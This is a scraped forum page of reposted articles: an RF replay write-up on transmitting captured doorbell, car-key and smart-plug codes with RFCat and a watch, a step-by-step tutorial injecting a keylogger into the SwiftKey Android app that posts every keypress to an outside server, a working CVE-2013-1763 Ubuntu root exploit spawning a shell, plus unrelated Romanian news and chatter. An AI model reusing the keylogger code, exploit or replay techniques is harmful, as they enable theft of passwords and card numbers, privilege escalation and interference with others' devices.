more accurate. Since a .wav file is just a header with a bunch of values for each sample, it's really easy to manipulate. In this case we want to take any value that is below 0 and set it to absolute minimum, and anything above 0 we set to maximum, which is effectively what the original source was doing before the signal got converted and sent over RF - a 0 was a pin going LOW and a 1 was a pin going HIGH... Accordingly, I wrote a little command line tool for tweaking wav files: [/FONT]$ wav-cli.py /tmp/test1.wav square 0 out /tmp/ts.wav Converting to square wave Writing /tmp/ts.wav [FONT=Arial] and this is the result: Now we can accurately convert the signal into true OOK binary. We take the smallest element as our single binary digit, and then represent the data with a 1 when we want the line to go high, and 0 when we want it to go low, taking into account the size of our pulse compared to the single binary digit. In this case we only have two different size pulses - short and long, so we can represent them with a single or double digit: Again, we need to add some leading or trailing 0s to give ourselves an 8-bit multiple, so the final number we end up with is 00101100 10010010 01001001 01101101 10110010, or 2C 92 49 6D B2 in HEX. Since it's always the same, we don't really need to understand what this message 'means', only to be able to reproduce it. So in theory, if I set up RFCat to work in OOK mode with the correct speed and modulation, I should be able to transmit 2C92496DB2 and my doorbell should ring (the speed I get by measuring a short pulse width in seconds) ... In [1]: d.setFreq(433920000) In [2]: d.setMdmDRate(int(1.0/0.000302)) In [3]: d.setMdmModulation(MOD_ASK_OOK) In [4]: d.RFxmit('\x2C\x92\x49\x6D\xB2') Hmm.... Nothing. However, my bell-push didn't just transmit the message once, it sent it dozens of times, so maybe I need to do the same: In [5]: d.RFxmit('\x2C\x92\x49\x6D\xB2' * 60) Nope, still nothing. Going back to my original trace I could see there was a gap between each data pulse, which we can easily simulate by adding some extra '0' bits, so: In [6]: d.RFxmit('\x2C\x92\x49\x6D\xB2\x00\x00\x00' * 60) Bingo! The doorbell rings and my dogs go crazy telling me there's someone at the door! Nice!!! Well, this is very cool and all, but it's not very, erm... Bond, is it? I mean, Daniel Craig isn't going to get the girl, save the world and keep Dame Judi happy by saying... "Hang on Bad Guys, I've just got to get my laptop out... plug in this USB dongle... nearly got it... just a tick... Ouch, that hurt!" No. Not really. What we need is something much cooler, sexier, and, well.... shiny! Something Gucci that's always right there, ready to go at a moment's notice... . But wait! What's that in the box of bits that came with my dev kit? A wristwatch? With a frikkin' transmitter built into it???? OK.... now that's what I'm talkin' 'bout! Come to Papa... And so, I give you the latest thing from my local toy store... It's called "radio": [h=2]Chronos Integrated Commander[/h] Or ChronIC for short... It's basically a cut-down RFCat-like firmware package that allows you to use the watch to transmit arbitrary signals. You can set it up either from the watch itself, or via the original Chronos dongle with a python helper, and then the up/down buttons on the right of the watch do the transmitting. The python helper looks like this: $ chronic-cli.py Usage: /usr/local/bin/chronic-cli.py <COMMAND> [ARG(s)] ... [<COMMAND> [ARG(s)] ... ] Commands: BAUD <RATE> Set RF modem baudrate BYRON Configure for Byron doorbell emulation DELAY <0-255> Delay in MS between each DATA transmission DOWN <HEX> <HEX> <HEX> Set DATA for DOWN button - 3 * 63 bytes EXIT Force sync mode EXIT on Chronos FREQ <FREQUENCY> Set Frequency (e.g. 433920000) FRIEDLAND Configure for Friedland doorbell emulation MAN <'ON'|'OFF'> Set Manchester Encoding MOD <FSK|GFSK|OOK|MSK> Modulation: FSK - Frequency Shift Keying GFSK - Gaussian Frequency Shift Keying OOK - On-Off Keying (in ASK mode) MSK - Multiple Frequency Shift Keying REPEAT <0-255> Number of times to repeat DATA when button pressed RUKU Configure for Ruku garage door emulation SERIAL <BAUD> Set access point comms baudrate (default 115200) PULSE <WIDTH> Set pulsewidth (baud rate = 1.0/pulsewidth) TIME Synchronise time/date UP <HEX> <HEX> <HEX> Set DATA for UP button - 3 * 63 bytes Commands will be executed sequentially and must be combined as appropriate. It is recommended to finish with an EXIT to help conserve battery. Full instructions are in the README in the github repo, but here is an example of setting it up to ring my doorbell. Put the watch in 'SYNC' mode, and then: $ chronic-cli.py freq 433920000 man off delay 0 repeat 60 pulse 0.000320 up 2C92496DB2000000 '' '' down 2C92496DB2000000 '' '' exit Setting Frequency: 433920000 (OK) Setting Manchester Encoding: OFF (OK) Setting delay: 0 (OK) Setting repeat: 60 (OK) Setting pulsewidth: 0.00032 (3124.237061 Hz) (OK) Setting UP Button: (OK) Setting DOWN Button: (OK) Sending EXIT command Or you can take the shortcut: $ chronic-cli.py byron Setting up for Byron Doorbell Setting Frequency: 433920000 Setting Manchester Encoding: OFF Setting Delay: 0 Setting Repeat: 60 Setting PulseWidth: 0.000320 (3124.237061 Hz) Setting UP button: 2C92496DB2000000 Setting DOWN button: 2C92496DB2000000 And there are plenty of other targets... Discussions on the gnuradio mailing list back in 2006 show that the obvious one of a car key was being looked at. Matt Ettus says: "After the Wired article today, I've received a couple of email from people who are concerned that the USRP could be used to clone their keyfob transmitters for car alarms and garage doors. I'm not concerned, since there are already many ways to do this (just check the back of pupular science magazine). However, I am curious about it. I know that we can capture and play back any rf signal. The question is whether that replayed signal would result in the door being unlocked. I was under the impression that most of those systems allow an unlock code to only be used once, but does anyone out there know for sure?" Well, here's your answer: Unlocking and re-locking my son's Beemer: And the wife's Disco (note the pause and the second set of 'clunks' - this is because the first command only opens the driver's door, but because we have the option to send multiple sequences we can send another open command which then opens the rest of the doors): Of course, opening car doors is a nice party trick, but because modern vehicles are secured by rolling codes, that's all it is - a party trick. You'll be able to do this once and once only with each 'hacked' sequence... What's of more concern to me are devices like the 'Owl Plug': These handy little devices allow you to control mains voltage appliances via RF. Clearly, this could have serious consequences if care is not taken when switching things on and off. What if it's an electric heater and it got shoved into a corner to vacuum the room? It gets switched back on and bingo, the curtains are on fire! Let's hope they've made the protocol nice and secure then! Oh, dear. No rolling code. Same bit sequence every time: And the only difference between the five buttons on the remote is a few bits. I suspect, therefore, that the only difference between my remote and my neighbour’s will also only be a few bits, so it's probably not much of an exercise to figure out which ones I need to brute force to be able to go around switching things on and off at random (I've ordered another one and will check, so watch this space...). As usual, the code is available on the Aperture Labs tools page, but please bear in mind that while playing with your own RF devices is perfectly OK in any reasonable society, playing with other people's (without their permission) is most definitely not (and probably illegal)! Behave! Posted by Adam "Major Malfunction" Laurie at 03:55 Sursa: Obviously a Major Malfunction...: You can ring my bell! Adventures in sub-GHz RF land...
  13. Nytro
    [h=1]Inserting keylogger code in Android SwiftKey using apktool[/h] Piracy on Android is a very big problem but I wonder do users realise how easy it is to inadvertently download apps with malware. Cracked copies of PC and iPhone apps can have malware as well of course but on both those platforms most software is compiled to machine code. Android apps are coded in Java and compiled to byte code that is run on the Dalvik VM and this byte code is not that hard to edit and insert back into an APK. SwiftKey Keyboard is the top paid app in the Play store at the moment and it’s a great app, best €4 I spent but I knew it’d be heavily pirated at that price. Now your standard malware-ridden Android app or game might have some code that sends you annoying notification ads but anyone who sideloads a dodgy copy of a Android keyboard is taking a serious risk of a keylogger being inserted and people tracking all their passwords, Google searches and Credit Card numbers. In this post, I’ll show you how to do exactly that with apktool and Swiftkey from start to finish, all you need is a basic knowledge of Java and Android. The end result is this Keylogger SwiftKey APK that sends all keylogs to my server. Try it out for yourself, download and install the modified APK, start using it and visit my logger page at www.android-app-development.ie/swiftkey_keylogger/keylogs.php, select your IP and see your keylogs being sent. Scary huh? Goes without saying, be sure to uninstall the app when you see how it works! Continue reading below to see how to do it. [h=2]SwiftKey APK[/h] First you’ve got to understand the Android file format that SwiftKey and all other Android apps are in. The Android package, or APK, is the container for an Android app’s resources and executables. It’s a zipped file that for SwiftKey contains simply: AndroidManifest.xml (serialized, but apktool decodes to source) classes.dex lib/ assets/ res/ META-INF/ The actual bytecode of the application is the classes.dex file, or the Dalvik executable that runs on the device. The application’s resources (i.e. images, sound files) reside in the res directory, and the AndroidManifest.xml is more or less the link between the two, providing some additional information about the application to the OS. The lib directory contains native libraries that Swiftkey uses via NDK, and the META-INF directory contains information regarding the application’s signature. [h=2]The Tools[/h] There’s a few different tools out there to decompile, compile and resign APKs. All the decompilers are based on or use smali to decompile/compile the classes.dex file. apktool wraps up a few of these tools in one but you still have to re-sign and then install on a device. So then there’s APK multitool which wraps apktool, keytool and other things to let you press one button and have your edited code compiled, zipped, signed and installed to your device via adb all in one go. So download that and set it up but remember it’s just a collection of other tools. [h=2]Disassembling SwiftKey[/h] Once you’ve installed APK multitool, you’d normally place your APK in the ‘place-apk-here-for-modding’ folder, open up Script.bat and enter 9 to decompile source and resources. Unfortunately SwiftKey throws errors when you try and recompile resources as it has capitalised resource filenames and was probably compiled with a modified aapt. We call these magick APKs and apktool can’t recompile edited resources but we can still compile edited smali code, which is all we want to make our keylogger anyway. So enter 27 to change the decompile mode to ‘Source Files only’, then enter 9 to decompile. If nothing goes wrong, there’ll be a folder created inside projects called ‘com.touchtype.swiftkey-1.apk’ containing: AndroidManifest.xml (still serialized, remember we didn’t decompile resources) res/ (same as in APK) smali/ apktool.yml The smali directory is probably the most important of the three, as it contains a set of smali files, or bytecode representation of the application’s dex file. You can think of it as an intermediate file between the .java and the executable. Inside the directory we have ‘com’,'oauth’ and ‘org’. We’re looking for code that we can place our keylogger so we can ignore oauth as that’s obviously a library for oauth access. org contains some Apache Commons library so that can be ignored as well. Inside com, android and google directories are to be ingored as well, it’s the touchtype and touchtype_fluency directories that we’re interested in. I’ve done the hard work already and found what we’re looking for in the ‘touchtype\keyboard\inputeventmodel\events’ directory. Go there and open up KeyInputEvent.smali in a text editor. We’re very lucky that SwiftKey isn’t ProGuard protected which obfuscates code and really slows down reverse engineering but never makes it impossible. [h=2]Reading the Smali[/h] So let’s examine some of the KeyInputEvent smali code: .class public abstract Lcom/touchtype/keyboard/inputeventmodel/events/KeyInputEvent; .super Lcom/touchtype/keyboard/inputeventmodel/events/TextInputEvent; .source "KeyInputEvent.java" # direct methods .method public constructor (Lcom/touchtype_fluency/service/TouchTypeExtractedText;Ljava/lang/CharSequence;)V .locals 0 .parameter "extractedText" .parameter "inputText" .prologue .line 8 invoke-direct {p0, p1, p2}, Lcom/touchtype/keyboard/inputeventmodel/events/TextInputEvent;->(Lcom/touchtype_fluency/service/TouchTypeExtractedText;Ljava/lang/CharSequence;)V .line 9 return-void .end method This class seems to be called whenever the user makes a single keypress in SwiftKey but not when using flow. The constructor is what we’re looking at and is called with 2 parameters, an instance of a ‘com/touchtype_fluency/service/TouchTypeExtractedText’ class and a CharSequence which is the key pressed. We want to send this key to our servers so we need to insert the code here. If you’re a smali expert you can code it directly and compile but we’re not so we’ll code some in Java first, decompile and copy the smali over. We also want to send it in an AsyncTask as the keyboard is way too slow without it. This is my Java code which we’ll call MainActivity.java, part of a package called ‘com.androidapps.tutorial’: @Override protected void onCreate(Bundle savedInstanceState) { super.onCreate(savedInstanceState); CharSequence cs = "Hi how are u"; HashMap<String, String> data = new HashMap<String, String>(); data.put("data", cs.toString()); AsyncHttpPost asyncHttpPost = new AsyncHttpPost(data); asyncHttpPost.execute("http://www.android-app-development.ie/swiftkey_keylogger/keypresses.php"); } public class AsyncHttpPost extends AsyncTask<String, String, String> { private HashMap<String, String> mData = null;// post data /** * constructor */ public AsyncHttpPost(HashMap<String, String> data) { mData = data; } /** * background */ @Override protected String doInBackground(String... params) { byte[] result = null; String str = ""; HttpClient client = new DefaultHttpClient(); HttpPost post = new HttpPost(params[0]);// in this case, params[0] is URL try { // set up post data ArrayList nameValuePair = new ArrayList(); Iterator it = mData.keySet().iterator(); while (it.hasNext()) { String key = it.next(); nameValuePair.add(new BasicNameValuePair(key, mData.get(key))); } post.setEntity(new UrlEncodedFormEntity(nameValuePair, "UTF-8")); HttpResponse response = client.execute(post); StatusLine statusLine = response.getStatusLine(); if(statusLine.getStatusCode() == HttpURLConnection.HTTP_OK){ result = EntityUtils.toByteArray(response.getEntity()); str = new String(result, "UTF-8"); } } catch (UnsupportedEncodingException e) { e.printStackTrace(); } catch (Exception e) { } return str; } /** * on getting result */ @Override protected void onPostExecute(String result) { // something... } } When we export this from Eclipse as an APK, decompile and look at the directory we find 2 files, MainActivity.smali and MainActivity$AsyncHttpPost.smali. The ‘$’ in the filename means it’s the AsyncHttpPost inner class. Let’s look at the onCreate of MainActivity: MainActivity.smali .method protected onCreate(Landroid/os/Bundle;)V .locals 6 .parameter "savedInstanceState" .prologue .line 146 invoke-super {p0, p1}, Landroid/app/Activity;->onCreate(Landroid/os/Bundle;)V .line 149 const-string v1, "Hi how are u" .line 150 .local v1, cs:Ljava/lang/CharSequence; new-instance v2, Ljava/util/HashMap; invoke-direct {v2}, Ljava/util/HashMap;->()V .line 151 .local v2, data:Ljava/util/HashMap;,"Ljava/util/HashMap<Ljava/lang/String;Ljava/lang/String;>;" const-string v3, "data" invoke-interface {v1}, Ljava/lang/CharSequence;->toString()Ljava/lang/String; move-result-object v4 invoke-virtual {v2, v3, v4}, Ljava/util/HashMap;->put(Ljava/lang/Object;Ljava/lang/Object;)Ljava/lang/Object; .line 152 new-instance v0, Lcom/androidapps/tutorial/MainActivity$AsyncHttpPost; invoke-direct {v0, p0, v2}, Lcom/androidapps/tutorial/MainActivity$AsyncHttpPost;->(Lcom/androidapps/tutorial/MainActivity;Ljava/util/HashMap;)V .line 153 .local v0, asyncHttpPost:Lcom/androidapps/tutorial/MainActivity$AsyncHttpPost; const/4 v3, 0x1 new-array v3, v3, [Ljava/lang/String; const/4 v4, 0x0 const-string v5, "http://www.android-app-development.ie/swiftkey_keylogger/keypresses.php" aput-object v5, v3, v4 invoke-virtual {v0, v3}, Lcom/androidapps/tutorial/MainActivity$AsyncHttpPost;->execute([Ljava/lang/Object;)Landroid/os/AsyncTask; .line 158 return-void .end method So we better explain some of this code. The first line is the smali method definition of onCreate with the Bundle parameter passed in and the return type at the end, which is V for void. Java primitives are denoted by a single letter and can be missed sometimes so keep an eye out for them. V void Z boolean B byte S short C char I int J long (64 bits) F float D double (64 bits Next line is very important for us, it declares how many local registers are to be used in this method without including registers allocated to the parameters of the method. The number of parameters for any given method will always be the number of input parameters + 1. This is due to an implicit reference to the current object that resides in parameter register 0 or p0 (in java this is called the “this” reference). The registers are essentially references, and can point to both primitive data types and java objects. Given 6 local registers, 1 parameter register, and 1 “this” reference, the onCreate() method uses an effective 8 registers For convenience, smali uses a ‘v’ and ‘p’ naming convention for local vs. parameter registers. Essentially, parameter (p) registers can be represented by local (v) registers and will always reside in the highest available registers. For this example, onCreate() has 6 local registers and 2 parameter registers, so the naming scheme will look something like this: v0 - local 0 v1 - local 1 v2 - local 2 v3 - local 3 v4 - local 4 v5 - local 5 v6/p0 - local 6 or parameter 0 (this) v7/p1 - local 7 or parameter 1 (android/os/Bundle) [h=2]Opcodes[/h] Dalvik opcodes are relatively straightforward, but there are a lot of them. For the sake of this post’s length, we’ll only go over a few of the most commonly used opcodes. invoke-super vx, vy, … invokes the parent classes method in object vx, passing in parameter(s) vy, … new-instance vx creates a new object instance and places its reference in vx invoke-direct vx, vy, … invokes a method in object vx with parameters vy, … without the virtual method resolution const-string vx creates string constant and passes reference into vx invoke-virtual vx, vy, … invokes the virtual method in object vx, passing in parameters vy, … return-void returns void [h=2]Hacking the App[/h] Now that I’ve explained a bit of what the code means, let’s inject it into the KeyInput file of SwiftKey. Note in our exported Smali from MainActivity that it references the ‘com/androidapps/tutorial’ package so we need to change that to the package where KeyInput is which is ‘com/touchtype/keyboard/inputeventmodel/events/’. So open up both MainActivity.smali and MainActivity$AsyncHttpPost and do a search and replace changing ‘com/androidapps/tutorial/MainActivity’ to ‘com/touchtype/keyboard/inputeventmodel/events/KeyInputEvent’. Next we’ve to ensure we have the right amount of registers in the SwiftKey KeyInputEvent to support our new method calls. We can see that the original constructor uses no local variables and our MainActivity uses 6 so just set locals 0 to locals 6. Then copy our new code in, just before the return void of the constructor. In our injected code, the v1 local variable holds the CharSequence ‘Hi how are u’ which is converted to a String in the ‘invoke-interface {v1}, Ljava/lang/CharSequence;->toString’ line. We need to make the code use the CharSequence key the user pressed which is the second parameter so change v1 to p2. Next copy over our AsyncTask inner class into the same folder as KeyInputEvent.smali and rename it to KeyInputEvent$AsyncHttpPost. Make similiar changes to the TextInputEvent.smali file in the same directory if you want to track SwiftKey flows as well. [h=2]Rebuilding, Signing and Installing the Apk[/h] Before it was a bit of work to do these three steps but with APK multitool all you need to do is enter 15 in your project with your phone connected and the app should install. If you encountered any errors, post a comment below and I’ll help you out. I might have left a few things out of this tutorial for brevity’s sake. If it all worked and you didn’t change the POST URL, just start using the keyboard and check my page at www.android-app-development.ie/swiftkey_keylogger/keylogs.php to see what keys are being sent from different IPs! Scary huh? Moral of the story if you want to avoid keyloggers or other malware from your Android? Stick to the Play store and don’t pirate apps! Sursa: Inserting keylogger code in Android SwiftKey using apktool | Android App Development Ireland
  14. Nytro
    [h=1]Cum afla advertiserii totul despre un user doar din Like-urile date pe Facebook[/h]de Redactia Hit | 12 martie 2013 Nenumarate studii au aratat ca Facebook-ul este, dincolo de fenomenul de comunicare si socializare, o adevarata mina de aur pentru advertiseri care pot targeta publicul in functie de activitatile acestora pe reteaua de socializare. Mai mult, cercetatorii au demonstrat ca simplele Like-uri pe care le dati pe reteaua de socializare pot releva atat de multe date incat pot duce la realizarea unui adevarat portret al personalitatii userului. Cercetatorii de la Universitatea din Cambridge impreuna cu Microsoft Research au demonstrat ca folosind aplicatia MyPersonality, cei interesati de comportamentul userilor in reteaua de socializare pot construi un adevarat portret robot al utilizatorilor. Destul de inspaimantator este faptul ca acest lucru se poate face doar urmarind Like-urile pe care cineva le da pe Facebook si nimic mai mult. Cercetatorii spun ca Like-urile de pe Facebook sunt cea mai bogata sursa de informati despre utilizatori. Doar urmarind Like-urile cercetatorii au putut stabili sexul, apartenenta etnica, dar si convingerile politice si religioase ale utilizatorilor. Acuratetea datelor rezultate dupa urmarirea Like-urilor userilor este de 80%. Surse: The Verge, The Wall Street Journal Via: Cum afla advertiserii totul despre un user doar din Like-urile date pe Facebook | Hit.ro
  15. Nytro
    [h=1]Wolfram Alpha, creierul din spatele Siri, va deveni ?i mai inteligent[/h] Dorian Prodan - 12 mar 2013 Stephen Wolfram, cercet?torul britanic din spatele proiectelor Mathematica ?i Wolfram Alpha, a anun?at în cadrul conferin?ei SXSW c? algoritmii de calcul impresionan?i din spatele acestor servicii vor cunoa?te îmbun?t??iri radicale în viitorul apropiat, acestea urmând s? beneficieze de o predic?ie care va simplifica utilizarea lor. Pentru cei mai pu?in familiariza?i cu Wolfram Alpha, aceasta este o platform? de calcul care, pe baza zecilor de mii de miliarde de tipuri de date agregate din surse diferite ?i a zecilor de mii de algoritmi matematici diferi?i care au fost dezvolta?i de-a lungul a trei decenii, ofer? nu banale rezultate, precum un motor de c?utare obi?nuit, ci r?spunsuri complexe. Cel mai faimos produs care folose?te algoritmii Wolfram Alpha este asistentul vocal Siri de la Apple, îns? compania ofer? o gam? larg? de aplica?ii pentru platformele mobile care permit utilizarea, generic? sau specializat?, a serviciilor sale. Toate aceste produse au îns? o mare problem?: sunt cam dificil de utilizat deoarece utilizatorii nu ?tiu întotdeauna cu exactitate ce vor s? afle. Pentru a trece de acest handicap ergonomic, Stephen Wolfram a anun?at c? Wolfram Alpha va primi o serie de rutine software pentru analiza datelor specificate sau introduse de utilizatori, acestea permi?ându-i s? prevad? întreb?rile pe care ace?tia le vor formula ?i s? ofere r?spunsuri f?r? a necesita utilizarea unei sintaxe greoaie. Un exemplu dat de Stephen Wolfram este cel al aplica?iilor de realitate augmentat?, care vor putea analiza mediul înconjur?tor, recunoa?te punctele de interes din jur ?i vor putea oferi date suplimentare despre acestea. Alte utiliz?ri vor fi mai pu?in spectaculoase, cum ar fi analiza automat? a datelor dintr-o foaie de calcul tabelar aleas? de utilizator, îns? toate fac parte din aceea?i campanie de implicare a modului de utilizare a serviciului. Toate aceste op?iuni vor fi lansate în viitorul apropiat în cadrul aplica?iilor pentru terminale mobile sub forma unui abonament. Odat? cu aceast? actualizare, ?i platforma Mathematica va fi disponibil? prin intermediul unor aplica?ii pe terminale mobile. Sursa: Wolfram Alpha, creierul din spatele Siri, va deveni ?i mai inteligent
  16. Nytro
    CVE-2013-1763 Ubuntu 12.10 64bit From: Kacper Szczesniak <kacper () qwe pl> Date: Mon, 11 Mar 2013 15:50:03 +0100 Hi All, Didn't find a working poc for 64bit Ubuntu so I wrote a quick mockup. kacper Attachment: a.c #include <unistd.h> #include <sys/socket.h> #include <linux/netlink.h> #include <netinet/tcp.h> #include <errno.h> #include <linux/if.h> #include <linux/filter.h> #include <string.h> #include <stdio.h> #include <stdlib.h> #include <linux/sock_diag.h> #include <linux/inet_diag.h> #include <linux/unix_diag.h> #include <sys/mman.h> typedef int __attribute__((regparm(3))) (* _commit_creds)(unsigned long cred); typedef unsigned long __attribute__((regparm(3))) (* _prepare_kernel_cred)(unsigned long cred); _commit_creds commit_creds; _prepare_kernel_cred prepare_kernel_cred; unsigned long sock_diag_handlers, nl_table; int __attribute__((regparm(3))) ) { commit_creds(prepare_kernel_cred(0)); return -1; } char stage1[] = "\xff\x25\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00"; int main() { int fd; unsigned long mmap_start, mmap_size = 0x10000; unsigned family; struct { struct nlmsghdr nlh; struct unix_diag_req r; } req; char buf[8192]; if ((fd = socket(AF_NETLINK, SOCK_RAW, NETLINK_SOCK_DIAG)) < 0){ printf("Can't create sock diag socket\n"); return -1; } memset(&req, 0, sizeof(req)); req.nlh.nlmsg_len = sizeof(req); req.nlh.nlmsg_type = SOCK_DIAG_BY_FAMILY; req.nlh.nlmsg_flags = NLM_F_ROOT|NLM_F_MATCH|NLM_F_REQUEST; req.nlh.nlmsg_seq = 123456; req.r.udiag_states = -1; req.r.udiag_show = UDIAG_SHOW_NAME | UDIAG_SHOW_PEER | UDIAG_SHOW_RQLEN; /* Ubuntu 12.10 x86_64 */ req.r.sdiag_family = 0x37; commit_creds = (_commit_creds) 0xffffffff8107d180; prepare_kernel_cred = (_prepare_kernel_cred) 0xffffffff8107d410; mmap_start = 0x1a000; if (mmap((void*)mmap_start, mmap_size, PROT_READ|PROT_WRITE|PROT_EXEC, MAP_SHARED|MAP_FIXED|MAP_ANONYMOUS, -1, 0) == MAP_FAILED) { printf("mmap fault\n"); exit(1); } *(unsigned long *)&stage1[sizeof(stage1)-sizeof(&x)] = (unsigned long)x; memset((void *)mmap_start, 0x90, mmap_size); memcpy((void *)mmap_start+mmap_size-sizeof(stage1), stage1, sizeof(stage1)); send(fd, &req, sizeof(req), 0); if(!getuid()) system("/bin/sh"); } Sursa: Full Disclosure: CVE-2013-1763 Ubuntu 12.10 64bit
  17. Nytro
    Ok, inchidem topicul si am terminat cu prostiile.
  18. Nytro
    Cat de gay sa fiti sa va faceti reclama aici?
  19. Nytro

    Cursuri RST

    Nytro replied to makav3li's topic in Off-topic

    Ba, s-au tinut si erau doar cate persoane interesate, de ce pula mea va plangeti?
  20. Nytro
    Tocmai asta e frumos, ca poti testa intr-un mediu real. Da, nu e tocmai "safe" pentru site dar cred ca lumea ii intelege utilitatea si nu se apuca de rahaturi... In plus ai direct shell (ksh) pe interfata, kernelul e vechi deci probabil se poate roota usor, insa de ce sa isi bata lumea joc de ceva frumos si foarte util? Nu e tocmai etic.
  21. Nytro
    [h=1]Kaspersky Lab a patentat tehnologia care detecteaza si inlatura bootkit-urile[/h] Kaspersky Lab a patentat o tehnologie care detecteaz? bootkit-urile ?i implementeaz? m?surile de securitate necesare pentru a le preveni. Aceast? tehnologie este creat? special pentru a combate una dintre cele mai periculoase amenin??ri cu care se confrunt? computerele - bootkit-urile care ruleaz? în sistem f?r? ca utilizatorul s? î?i dea seama, activându-se înaintea sistemului de operare ?i a antivirusului.
      • 1
      • Upvote
  22. Nytro
    Ascultati
  23. Nytro
    Haidi bre, ai shell direct pe site: Execute korn, ksh shell online Plm, site-ul poate fi foarte util, nu va bateti joc.
  24. Nytro
    Ar trebui sa existe peste tot, sau fiecare sa isi impuna daca lucreaza singur, ceea ce se cheama "coding style", care include si comentariile. De exemplu orice functie sa aiba deasupra comentariu care sa explice ce face si ce reprezinta fiecare parametru, pe scurt. Da, poate ziceti ca nu e nevoie pentru functii simple, dar cand dati de o functie cu 15 parametri trebuie sa stiti ce face fiecare ca sa nu pierdeti 2 ore sa intelegeti functia. Iar comentariile in primul rand va ajuta pe voi, cand recititi codul, cel putin pe mine ma ajuta mult si chiar as zice ca scriu cam multe comentarii, insa nu cred ca strica. Exemplu: /////////////////////////////////////////////////////////////////////////// /// @brief Functia asta face ceva smecher /// @retval Si returneaza numarul magic /// @param [in] nNumar Un numar oarecare /// @param [out] pcoutBuffer Un buffer de dimensiune X /////////////////////////////////////////////////////////////////////////// int Functie(int p_nNumar, char *p_pcoutBuffer) { ... } Cam acesta e stilul doxygen care poate genera documentatie HTML superba.
  25. Nytro
    [h=2]Podcast: CanSecWest Founder Dragos Ruiu Talks Pwn2Own, Hacker Culture[/h]What's the connection between British hacker Daniel Cuthbert and the annual Pwn2Own challenge? CanSecWest organizer and security industry "dinosaur" Dragos Ruiu explains why Pwn2Own was created and shares his thoughts on the evolution of hacking and exploit writing. [h=3]CanSecWest Founder Dragos Ruiu Talks Pwn2Own, Hacker Culture (19:04)[/h] Download the MP3 Date: March 8, 2013 By: SecurityWeek Description: What's the connection between British hacker Daniel Cuthbert and the annual Pwn2Own challenge? CanSecWest organizer and security industry "dinosaur" Dragos Ruiu explains why Pwn2Own was created and shares his thoughts on the evolution of hacking and exploit writing. Sursa: Podcast: CanSecWest Founder Dragos Ruiu Talks Pwn2Own, Hacker Culture | SecurityWeek.Com
×
×
  • Create New...